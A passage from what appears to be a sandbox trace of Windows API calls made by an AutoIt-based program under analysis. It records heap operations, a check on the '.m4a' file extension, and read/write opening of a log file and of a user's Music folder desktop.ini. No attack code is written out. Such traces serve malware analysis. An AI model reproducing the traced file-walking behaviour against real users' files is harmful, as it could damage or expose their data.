hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.864] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.865] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.865] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.866] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.867] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.868] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.869] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.870] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.870] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.870] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x231c, lpOverlapped=0x0) returned 1 [0037.871] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.871] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x231c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.871] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.871] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.871] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.871] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.871] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.871] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.871] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.871] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.871] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.872] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889988 [0037.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889988, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.872] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.872] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.872] PeekMessageW 